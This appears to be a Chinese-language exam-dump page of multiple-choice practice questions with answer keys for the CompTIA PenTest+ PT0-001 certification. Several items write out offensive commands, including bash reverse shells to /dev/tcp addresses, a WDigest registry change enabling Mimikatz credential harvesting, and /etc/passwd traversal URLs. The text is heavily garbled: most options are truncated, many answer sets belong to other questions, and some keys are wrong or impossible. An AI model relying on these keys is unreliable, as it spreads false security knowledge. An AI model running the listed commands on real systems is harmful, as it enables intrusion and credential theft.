不想錯過任何事?

通過認證考試的技巧

最新考試新聞和折扣資訊

由我們的專家策劃和更新

是的,請向我發送時事通訊

最新 CompTIA PenTest+ PT0-001 考試試卷 - 您的成功之路

使用高質量的練習題和學習材料準備 CompTIA PenTest+ PT0-001 考試是成功通過考試的關鍵。利用準確反映真實考試環境的可靠考試資源有助於確定需要進一步學習的領域。模擬考試可以模擬實際考試的形式和難度,讓您能夠衡量自己的準備程度。精心設計的考試問題和答案涵蓋了各種滲透測試和漏洞管理主題,使您能夠鞏固所學知識。此外,利用知名供應商提供的學習指南和模擬測試可確保您關注相關的最新考試內容。通過使用全面的備考資源進行充分準備,您將增加自信應對 CompTIA PenTest+ PT0-001 認證考試的機會。
參加其他線上考試

問題 #1
滲透測試人員查看一個網絡應用程序的掃描結果。以下哪個漏洞最爲關鍵,應優先利用?
A. 儲的 XSS
B. 填寫路徑披露
C. 過期證書
D. 擊劫持
查看答案
正確答案: A
問題 #2
在一次內部網絡滲透測試中,一名測試人員爲一個已知在多個目標系統上擁有完全管理員權限的用戶找回了 NTLM 密碼散列。以下哪項是繼續開發的最佳目標?
A. 作系統:Windows 7 開放端口:23, 161
B. 作系統:Windows Server 2016 開放端口:53, 5900
C. 作系統:Windows 8
D. 作系統:Windows 8 開放端口:514, 3389
查看答案
正確答案: C
問題 #3
滲透測試人員在入侵單個工作站後,能夠在整個域內橫向移動,障礙極少。在報告中最好推薦以下哪種緩解策略?(請選擇三項)。
A. 證轉儲攻擊
B. LL注入攻擊
C. 向炮彈攻擊
D. 過哈希攻擊
查看答案
正確答案: CDE
問題 #4
在一次內部滲透測試中,觀察到多個組播和廣播名稱解析請求在網絡中穿行。以下哪些工具可用於冒充網絡資源和收集身份驗證請求?
A. ttercap
B. cpdump
C. 答覆者
D. 美杜莎
查看答案
正確答案: C
問題 #5
一名軟件開發人員希望測試應用程序的代碼是否存在漏洞。軟件開發人員應執行以下哪些流程?
A. 洞掃描
B. 動態掃描
C. 態掃描
D. 規性掃描
查看答案
正確答案: A
問題 #6
在滲透測試期間,測試人員運行了一個網絡釣魚活動,並從運行 Windows 10 操作系統的內部 PC 收到了一個外殼。測試人員希望使用 Mimikatz 執行憑據收集。以下哪項註冊表更改允許在內存中緩存憑據?
A. eg add HKLM\System\ControlSet002\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 0
B. eg add HKCU\System\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
C. eg add HKLM\Software\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
D. eg add HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest /v userLogoCredential /t REG_DWORD /d 1
查看答案
正確答案: A
問題 #7
滲透測試人員被要求對基於 REST 的網絡服務進行滲透測試。需要以下哪些項目?
A. 新的漏洞掃描結果
B. 申請請求示例清單
C. 能存在的漏洞的最新清單
D. 測試賬戶樣本清單
查看答案
正確答案: B
問題 #8
滲透測試人員執行以下命令:以下哪項是攻擊者正在利用的本地主機漏洞?
A. 件權限不安全
B. 用程序白名單
C. 殼轉義
D. 可寫服務
查看答案
正確答案: A
問題 #9
滲透測試人員正在掃描一個網絡的 SSH,並有一份提供的目標列表。測試人員應該使用下列哪些 Nmap 命令?
A. nmap -p 22 -iL targets
B. nmap -p 22 -sL targets
C. nmap -p 22 -oG targets
D. nmap -p 22 -oA targets
查看答案
正確答案: A
問題 #10
一名工程師在對一個網絡應用程序進行滲透測試時,發現用戶登錄過程使用 HTTP GET 方法從字段數據中發送。爲降低暴露敏感信息的風險,應使用 HTTP GET 方法發送表單:
A. HTTP POST 方法。
B. TTP OPTIONS 方法。
C. TTP PUT 方法。
D. TTP TRACE 方法。
查看答案
正確答案: A
問題 #11
一名安全分析員在一個網絡應用程序的日誌中發現了一個可疑請求。下面的 URL:http:www.company-site.com/about.php?i=_V_V_V_V_VetcVpasswdWhich 最有可能是漏洞的攻擊類型?
A. 範圍蠕變
B. 事後審查
C. 接受風險
D. 威脅預防
查看答案
正確答案: B
問題 #12
攻擊者使用 SET 複製了一家公司的雲託管網絡郵件門戶,並發送電子郵件希望首席執行官 (CEO) 登錄以獲取 CEO 的登錄憑據。這是以下哪種攻擊類型的示例?
A. 導攻擊
B. 假冒攻擊
C. 叉式網絡釣魚攻擊
D. 渡式下載攻擊
查看答案
正確答案: A
問題 #13
在對 corp.local 域進行網絡滲透測試的信息收集階段,以下哪個命令可以提供域控制器列表?
A. slookup -type=srv _ldap
B. map -sV -p 389 -script=ldap-rootdse corp
C. et 組 "域控制器" /domain
D. presult /d corp
查看答案
正確答案: A
問題 #14
某公司聘請滲透測試人員確定其新安裝的 VPN 集中器是否存在任何漏洞,該集中器的外部 IP 爲 100.170.60.5。以下哪個命令可以測試 VPN 是否可用?
A. pipe
B. ke-scan -A -t 1 --sourceip=spoof_ip 100
C. map -sS -A -f 100
D. c 100
查看答案
正確答案: B
問題 #15
單擊 "展示 "按鈕。當網絡管理員向滲透測試人員展示一個給網絡帶來麻煩的數據包樣本時,滲透測試人員正在進行評估。測試人員應該阻止以下哪種類型的攻擊?
A. NMP暴力破解
B. RP欺騙
C. NS緩存中毒
D. MTP 中繼
查看答案
正確答案: A
問題 #16
攻擊者喬打算將受害者賬戶中的資金悄悄轉移到自己的賬戶中。他可以使用以下哪個 URL 來完成這次攻擊?
A. ttps://testbank
B. ttps://testbank
C. ttps://testbank
D. ttps://testbank
查看答案
正確答案: B
問題 #17
如果安全顧問發現密碼哈希值類似於以下內容:b117525b345470c29ca3d8ae0b556ba8 以下哪種格式是正確的哈希值類型?
A. erberos
B. etNTLMv1
C. TLM
D. HA-1
查看答案
正確答案: D
問題 #18
滲透測試人員希望手動檢查系統中是否存在 "幽靈 "漏洞。以下哪種方法是驗證漏洞的正確方法?
A. 將 GHOST 文件下載到 Linux 系統,然後 compilegcc -o GHOSTtest i:
B. 將 GHOST 文件下載到 Windows 系統,然後編譯 gcc -o GHOST GHOST
C. 將 GHOST 文件下載到 Linux 系統,然後編譯 gcc -o GHOST GHOST
D. 將 GHOST 文件下載到 Windows 系統,然後編譯 GCC -o GHOSTtest i:
查看答案
正確答案: C
問題 #19
滲透測試人員在網絡應用程序滲透測試中發現內容安全策略標頭丟失。滲透測試人員最有可能採用以下哪種技術?
A. 令注入攻擊
B. 擊劫持攻擊
C. 錄遍歷攻擊
D. 程文件包含攻擊
查看答案
正確答案: B
問題 #20
在後期開發過程中,測試人員發現只有系統二進制文件會通過出口過濾器,並用以下命令存儲文件:c:\creditcards.db>c:\winit\system32\calc.exe:creditcards.db這條命令利用了以下哪個文件系統漏洞?
A. 分級文件系統
B. 備用數據流
C. 門成功
D. 擴展文件系統
查看答案
正確答案: B
問題 #21
滲透測試人員正在掃描一個網絡的 SSH,並有一份提供的目標列表。測試人員應該使用下列哪些 Nmap 命令?
A. map -p 22 -iL targets
B. map -p 22 -sL targets
C. map -p 22 -oG targets
D. map -p 22 -oA targets
查看答案
正確答案: A
問題 #22
一名滲透測試人員正在檢查一個腳本,以確定一些基本數學錯誤持續存在的原因。預期結果是程序輸出 "True"。鑑於上述控制臺的輸出,以下哪項說明了如何糾正腳本中的錯誤?(請選擇兩項)。
A. OW
B. DA
C. ULA
D. PA
查看答案
正確答案: BD
問題 #23
在權限有限的 Windows 系統上嘗試維護持久性時,測試人員應使用以下哪個註冊表鍵值?
A.
B.
C.
D.
查看答案
正確答案: C
問題 #24
滲透測試人員會利用以下哪些工具來執行 OSINT? 請選擇兩項)。
A. 客戶機的 MAC 地址
B. 域控制器的 MAC 地址
C. 絡服務器的 MAC 地址
D. 關的 MAC 地址
查看答案
正確答案: AE
問題 #25
滲透測試人員希望從 IP 地址爲 10.0.0.20 的遠程入侵主機啓動圖形控制臺窗口,並在 IP 地址爲 192.168.1.10 的本地計算機上顯示終端。以下哪種方法可以完成這項任務?
A. 在遠程計算機上運行以下命令:export XHOST 192
B. 從本地計算機運行以下命令:ssh -L4444:127
C. 從遠程計算機運行以下命令:ssh -R6000:127
D. 本地計算機上運行以下命令:nc -l -p 6000然後,在遠程計算機上運行以下命令:xterm | nc 192
查看答案
正確答案: A
問題 #26
以下哪項最適合對目標的外部域執行被動偵察?
A. each
B. eWL
C. penVAS
D. hodan
查看答案
正確答案: D
問題 #27
以下哪項是魚叉式網絡釣魚攻擊的示例?
A. SOAP 信息示例
B. EST API 文檔
C. 協議模糊工具
D. 用的 XSD 文件
查看答案
正確答案: A
問題 #28
以下哪項最好地解釋了爲什麼在進行滲透測試時必須對任何已確定的發現保密?
A. 透測試結果通常包含公司的知識產權
B. 果公開滲透測試結果,可能會導致消費者不滿。
C. 透測試結果是包含保密信息的法律文件。
D. 透測試結果可幫助攻擊者入侵系統。
查看答案
正確答案: D
問題 #29
在全面安全評估過程中,以下哪項是通過實際接觸對目標實施社會工程的先決條件?
A. 確定緊急出口的位置
B. 準備藉口
C. 肩膀衝浪
D. 隨受害者
查看答案
正確答案: B
問題 #30
某公司計劃並獲得了聘請顧問執行網絡應用程序滲透測試的預算。發現漏洞後,該公司要求顧問執行以下任務:-代碼審查-更新防火牆設置在這種情況下,發生了以下哪種情況?
A. 務列舉
B. 收集 OSINT
C. 口掃描
D. 社會工程學
查看答案
正確答案: A
問題 #31
一名滲透測試人員在一臺計算機上運行了以下 Nmap 掃描:nmap -aV 192.168.1.5該組織稱已在其環境中禁用 Telnet。但是,Nmap 掃描結果顯示端口 22 已關閉,端口 23 對 SSH 開放。以下哪項是對所發生情況的最佳解釋?
A. 織未能禁用 Telnet。
B. map 結果包含端口 23 的誤報。
C. 口 22 已被過濾。
D. 服務在非標準端口上運行。
查看答案
正確答案: A
問題 #32
滲透測試約定協議的下列哪項屬性對觀察和測試最高負載下的生產系統影響最大?
A. 創建關鍵生產系統範圍
B. 制定測試訪問時間安排表
C. 立白盒測試約定
D. 管理層籤字批准侵入式測試
查看答案
正確答案: B
問題 #33
滲透測試人員已成功部署了邪惡孿生系統,並開始看到一些受害者流量。下一步,滲透測試人員要捕獲所有未加密的受害者網絡流量。以下哪種方法能最好地實現這一目標?
A. 行 HTTP 降級攻擊
B. 獲取用戶憑證來解密流量。
C. 行 MITM 攻擊
D. 過冒充可信 CA 實施 CA 攻擊。
查看答案
正確答案: A
問題 #34
以下哪項最恰當地描述了綜合控制系統(如電力設施、天然氣設施、水壩和核設施中使用的控制系統)的一些重大安全弱點?
A. CS供應商在實施適當的安全控制方面進展緩慢。
B. 合監控中心的工作人員沒有接受過履行基本職責的充分培訓。
C. 鍵設備的替換設備稀缺。
D. 缺乏對綜合監控系統設施的合規管理。
查看答案
正確答案: B
問題 #35
滲透測試人員對包含重要數據庫的特定主機進行了漏洞掃描,發現了以下漏洞:-XSS-允許使用 HTTP DELETE 方法-SQL 注入-易受 CSRFT 影響,測試人員應最優先考慮以下哪個漏洞?
A. QL注入
B. 許使用 HTTP DELETE 方法
C. 受 CSRF 影響
D. SS
查看答案
正確答案: B
問題 #36
一名滲透測試人員想編寫一個腳本,找出某個 IP 地址範圍的所有 RPTR 記錄。以下哪種方法最有效?
A. map -p 53 -oG dnslist
B. slookup -ns 8
C. or x in {1
D. ig -r > echo "8
查看答案
正確答案: A
問題 #37
鑑於以下情況:http://example.com/download.php?id-.../.../.../etc/passwdWhich,以下哪項最恰當地描述了上述攻擊?
A. 惡意上傳文件攻擊
B. 定向攻擊
C. 錄遍歷攻擊
D. 安全的直接對象引用攻擊
查看答案
正確答案: C
問題 #38
在一次網絡應用評估中,滲透測試人員發現服務器上可以執行任意命令。滲透測試人員想進一步實施攻擊,於是開始探索如何獲得反向 shell,回到位於 192.168.1.5 的攻擊機器。以下哪些是可能的方法?(請選擇兩項)。
A. 發物聯網設備的製造商不太關注安全問題。
B. 理員很難全面實施相同的安全標準。
C. 物聯網系統往往缺乏更安全解決方案所需的硬件能力。
D. 管機構對物聯網系統的安全要求通常較低。
查看答案
正確答案: BC
問題 #39
出於以下哪種原因,滲透測試人員需要隨時掌握客戶的聯繫人信息?(選擇三個)。
A. SASS
B. SAM 數據庫
C. 動目錄
D. 記
查看答案
正確答案: ACF
問題 #40
滲透測試人員入侵了一臺 Windows 服務器,並試圖實現持久性。以下哪種方法可以實現這一目標?
A. chtasks
B. et session server | dsquery -user | net use c$
C. owershell && set-executionpolicy unrestricted
D. eg 保存 HKLM\System\CurrentControlSet\Services\Sv
查看答案
正確答案: D
問題 #41
滲透測試人員正在撰寫一份報告,概述運行的總體風險水平。滲透測試人員應在報告的以下哪個部分中寫明?
A. 平提升權限。
B. 取頁面中的隱藏字段。
C. 析 HTTP 響應代碼
D. 索 HTTP 標頭
查看答案
正確答案: B
問題 #42
在以下哪個組件中,被利用的漏洞最有可能同時影響多個運行中的應用程序容器?
A. 普通圖書館
B. 配置文件
C. 箱逃生
D. ASLR 旁路
查看答案
正確答案: A
問題 #43
一家公司要求滲透測試人員對內部開發的 Android 應用程序的安全性進行審查。滲透測試人員收到了一個 APK 文件以支持評估。滲透測試人員希望在 APK 文件上運行 SAST。滲透測試人員必須首先完成以下哪些準備步驟?(選擇兩項)。
A. 時的軟件可能包含可被利用的組件。
B. 能採用了薄弱的密碼管理方法。
C. 密技術薄弱的協議可能會被攔截。
D. 絡服務器配置可能會泄露敏感信息
查看答案
正確答案: AB
問題 #44
一名滲透測試人員正在查看無線嗅探器的以下輸出結果:從上述信息可以推斷出以下哪項?
A. 恐懼原則
B. 權力原則
C. 缺性原則
D. 似性原則
E. 會證明原則
查看答案
正確答案: C
問題 #45
一名滲透測試人員從一個被破壞的 "python -c 'import pty;pty.spawn ("/bin/bash") '. "中運行了以下內容,該測試人員正在執行以下哪些操作?
A. 刪除 Bash 歷史記錄
B. 級外殼
C. 建沙箱
D. 捕捉憑證
查看答案
正確答案: B
問題 #46
客戶要求滲透測試人員模擬一名最近被解僱的服務臺技術人員。以下哪項最恰當地描述了威脅行爲者的能力?
A. 級持續性威脅
B. 本小子
C. 黑客活動家
D. 有組織犯罪
查看答案
正確答案: B
問題 #47
首席執行官(CEO)向首席財務官(CFO)發送了一封電子郵件,稱需要電匯支付一家新供應商。首席執行官否認曾發送過這封電子郵件。這次攻擊使用了以下哪種動機?
A. 修改網絡服務器加密配置,使用更強的密碼套件進行加密、散列和數字籤名。
B. 施新的培訓,以了解訪問應用程序的風險。在漏洞補丁修補後,該培訓可停止使用。
C. 施 ACL,限制只有財務部門才能訪問應用程序。修補漏洞後,重新向公司員工開放應用程序。
D. 要求工資單用戶更改用於驗證應用程序的密碼。修補漏洞後,再次要求更改密碼。
查看答案
正確答案: B
問題 #48
測試人員打算在目標系統上運行以下命令:bash -i >& /dev/tcp/10.2.4.6/443 0> &1在測試人員的 Linux 系統上還需要執行以下哪條命令才能成功執行上一條命令?
A. c -nlvp 443
B. c 10
C. c -w3 10
D. c -e /bin/sh 10
查看答案
正確答案: D
問題 #49
一名安全顧問收到一份文件,其中概述了即將進行的滲透測試的範圍。該文檔包含 IP 地址和每個地址可被掃描的時間。以下哪項內容包含此信息?
A. 交戰規則
B. 徵求建議書
C. 服務協議
D. 務影響分析
查看答案
正確答案: A
問題 #50
在 Linux 文件系統上運行以下命令:chmod 4111 /usr/bin/sudo以下哪個問題現在可能被利用?
A. 核漏洞
B. 性位
C. 報價服務路徑
D. 置錯誤的 sudo
查看答案
正確答案: B
問題 #51
如果安全顧問發現密碼哈希值類似於以下內容:b117525b345470c29ca3d8ae0b556ba8 以下哪種格式是正確的哈希值類型?
A. Kerberos
B. etNTLMv1
C. TLM
D. HA-1
查看答案
正確答案: D
問題 #52
在一臺被攻擊計算機的歷史文件中發現以下一行。攻擊者運行了以下命令:bash -i >& /dev/tcp/192.168.0.1/80 0> &1以下哪項描述了該命令的作用?
A. 鎖
B. 出口傳感器觸發
C. 鎖
D. 旁路鎖定
查看答案
正確答案: C
問題 #53
一名保安員觀察到一個人在掃描胸卡後進入大樓。然後,保安審核了證件系統,發現該證件在過去 30 分鐘內有兩次記錄。以下哪種情況最有可能發生?
A. 章是克隆的。
B. 理訪問控制服務器出現故障。
C. 統達到交叉錯誤率。
D. 員工丟失了徽章。
查看答案
正確答案: A
問題 #54
滲透測試人員準備進行 API 測試。以下哪項對準備這項工作最有幫助?
A. 克託
B. 爭
C. 3AF
D. 瓦格
查看答案
正確答案: D
問題 #55
滲透測試人員擁有域控制器的完整 shell,希望發現 21 天內未對域進行身份驗證的任何用戶帳戶。以下哪條命令能最好地實現這一目標?
A. dsrm -users ?€DN=company
B. dsuser -name -account -limit 3
C. dsquery user -inactive 3
D. dsquery -o -rdn -limit 21
查看答案
正確答案: D
問題 #56
在物理滲透測試方案中,滲透測試人員可實際訪問一臺筆記本電腦。筆記本電腦已登錄但被鎖定。以下哪項是從設備中提取憑證的潛在下一步?
A. 力破解用戶密碼
B. 行 ARP 欺騙攻擊
C. 利用 BeEF 框架獲取證書。
D. 行 LLMNR/NETBIOS-ns 中毒。
查看答案
正確答案: A
問題 #57
在物理滲透測試方案中,滲透測試人員可實際訪問一臺筆記本電腦。筆記本電腦已登錄但被鎖定。以下哪項是從設備中提取憑證的潛在下一步?
A. 力破解用戶密碼。
B. 行 ARP 欺騙攻擊。
C. 用 BeEF 框架獲取證書。
D. 行 LLMNR/NETBIOS-ns 中毒。
查看答案
正確答案: A
問題 #58
滲透測試者入侵了一個可以通過 443 端口不受限制地訪問任何主機的系統。滲透測試員希望創建一個從受害者返回攻擊者的反向外殼。滲透測試者最有可能使用以下哪種方法?
A. erl -e "use SOCKET'; $i='; $p='443;
B. sh superadmin@-p 443
C. c -e /bin/sh443
D. ash -i >& /dev/tcp//443 0>&1
查看答案
正確答案: D
問題 #59
以下哪項是滲透測試人員在任務結束時運行 chkconfig --del servicename 命令的原因?
A. rpspoof
B. map
C. 答器
D. urpsuite
查看答案
正確答案: A
問題 #60
以下哪種情況會導致滲透測試人員在測試過程中與系統所有者/客戶溝通?
A. 針對關鍵漏洞採用簡易補償控制措施,以最大限度地降低風險,然後重新確定補救措施的優先次序。
B. 出可以最快速解決的問題,並首先解決這些問題。
C. 先實施影響最小的關鍵漏洞補救措施,然後處理其他關鍵漏洞
D. 先修復最關鍵的漏洞,即使這意味着修復其他漏洞可能需要很長時間。
查看答案
正確答案: BD
問題 #61
您是一名安全分析師,負責加固網絡服務器。您收到了一份被標記爲惡意的 HTTP 有效負載列表:
A. 案見說明部分。
查看答案
正確答案: A
問題 #62
一名保安在掃描胸卡後觀察到一個人進入大樓。該設施的旋轉柵門有嚴格的出入證要求。然後,保安審核了胸卡系統,發現該胸卡在過去 30 分鐘內有兩次登錄記錄。以下哪種情況最有可能發生?
A. 章是克隆的
B. 理訪問控制服務器出現故障。
C. 統達到了交叉錯誤率。
D. 員工丟失了徽章
查看答案
正確答案: A
問題 #63
以下哪條命令允許滲透測試人員在 Metasploit 中從互聯網訪問專用網絡?
A. et rhost 192
B. un autoroute -s 192
C. b_nmap -iL /tmp/privatehosts
D. 用輔助/服務器/socks4a
查看答案
正確答案: A
問題 #64
以下哪項是保密協議的目的?
A. 概述雙方之間的保密條款
B. 述授權測試的系統範圍
C. 述允許的技術測試要求
D. 述網絡的詳細配置
查看答案
正確答案: A
問題 #65
一名不在客戶網絡中的滲透測試人員正在使用 Nmap 掃描網絡中的主機。滲透測試人員沒有收到對命令:nmap 100.100/1/0-125 的任何響應,以下哪個命令返回結果最好?
A. map -Pn -sT 100
B. map -sF -p 100
C. map -sV -oA 輸出 100
D. map 100
查看答案
正確答案: A
問題 #66
給定以下 Python 腳本:以下哪項是輸出結果的去向?
A. 幕
B. 絡服務器
C. 文件
D. o /dev/null
查看答案
正確答案: C
問題 #67
客戶要求滲透測試人員評估一個新網絡應用程序的可用性。測試人員應該使用以下哪種類型的攻擊?
A. CP SYN 洪水
B. QL注入
C. SS
D. XMAS 掃描
查看答案
正確答案: B
問題 #68
以下哪項最適合對目標外部域進行被動偵察?
A. 子
B. eWL
C. penVAS
D. 丹
查看答案
正確答案: D
問題 #69
要利用簡單的緩衝區溢出,滲透測試人員需要覆蓋以下哪個 CPU 寄存器?
A. 堆棧指針寄存器
B. 索引指針寄存器
C. 棧基指針
D. 目的地索引寄存器
查看答案
正確答案: A

提交後看答案

請提交您的電子郵件和WhatsApp以獲取問題的答案。

注意:請確保您的電子郵件 ID 和 Whatsapp 有效,以便您獲得正確的考試結果。

電子郵件:
WhatsApp/電話號碼: